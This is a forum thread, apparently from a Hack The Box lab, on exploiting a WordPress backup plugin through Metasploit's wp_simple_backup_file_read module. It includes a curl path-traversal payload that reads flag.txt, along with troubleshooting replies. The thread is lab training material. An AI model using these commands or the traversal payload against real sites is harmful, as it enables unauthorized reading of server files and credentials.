Hello, its x69h4ck3r, i am gonna make this straight forward as possible,

cos you ma have spent hours on this.

Ok!, lets jump into it.

Step 1: Search for the plugin exploit on the web.
example; search on google.com like this; “Backup Plugin 2.7.10 for WordPress exploit”
when done, you will get lots of result.
pick the one with rapid7, its short…

in rapid7 the metasploit exploit for this vulnerability
is shown; “wp_simple_backup_file_read”.
we then go in our terminal and fire up the metasploit framework
in other to use this exploit on our target server.

Step 2: Fire up the metasploit DataBase.

this command in your terminal to start up the postgresl db

systemctl start postgresql

this command to run the metasploit

msfconsole

search for the exploit using this command

search exploit wordpress plugin backup

locate “wp_simple_backup_file_read” and use the command bellow

use auxiliary/scanner/http/wp_simple_backup_file_read

when in the command, type “show options”

change the rhosts to the target_ip;

change rport to the target_port

change filepath to /flag.txt

press enter, cross-check your parameters by using the “show options” command

once satisfied, type the “run or exploit” command to get the exploit working,

and the flag will be downloaded into the .msf4/loot/ folder

you can use "locate /.msf4/loot/ " to locate and pivot into the directory

and then read the file with the “cat” command…

i hope this was useful… please like and comment, let me know if this solved your problem.

When I do this, nothing downloads into the loot folder. It just says:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here are my options for reference:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     142.93.47.26     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      30633            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

What do you think? What am I doing wrong? Is there something wrong with the box?

I’ll just reply to myself. I ended up using pwnbox and it worked lol. Hours later. ugh

for the record, I also tried it with just “flag.txt” (no quotes) as the filepath… and a lot of other things, including a bunch of stuff you’d expect to see in /etc

Your settings are correct. I just ran it with this and was successful. Not sure why it wouldn’t have worked.

2023-03-11_15-19738×499 45 KB

Thank You so much mate. That really worked

For a minute I took got confused when I didn’t see the msf output. Later I realized I forgot to set the RPORT associated to the target IP. Once I did I got the output.

See whether all the parameters are provided.

HTB-PublicExploit745×258 31.7 KB

Two questions:
1). The nmap of my Target Instance is as follows:
nmap -sV -A -p<Target Instance Port #> <Target Instance IP address without Port #>
PORT STATE SERVICE VERSION
<Target Instance Port #>/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)

How should we know to target the WordPress application and not Apache 2.4.41?

2). How would we know (aside from the tip) to use a ‘plugin’ type of attack against the WordPress application?

If anyone isn’t getting a file output, sudoing msfconsole worked for me

Well, that was annoying. Why would it work using pwnbox but not my regular machine…

It’s asking for a password…

thank you got me in the right direction

Thanks for this. I got as far as running the exploit, but I didn’t know where to look for the flag. How did you know it would be found in .msf4/loot/?

Simple Run curl -v "http://<ip>:<port>/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt" to get the flag

This was a life saver bro… thank you

The output will tell you where it is.

image836×90 23.7 KB

add sudo before the command

Same situation here

I got this after runing your command. I’m running it on my host, and the msfconsole exploit also show no output with correct parameters

image1122×239 9.5 KB

image922×438 17.9 KB

When playing around with web request and you get error like this its always helpful to use Burp Suite to intercept the web request and response and check what is the root cause there.
curl -v -x http://127.0.0.1:8080 "http://<ip>:<port>/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt"
The -x http://127.0.0.1:8080 flag here indicates that the request will go through the Burp Suite proxy. Once you capture the request, sent it to Repeater and play around the request there. You’ll get to know whether the payload is incorrect or there is some problem with the network/VPN.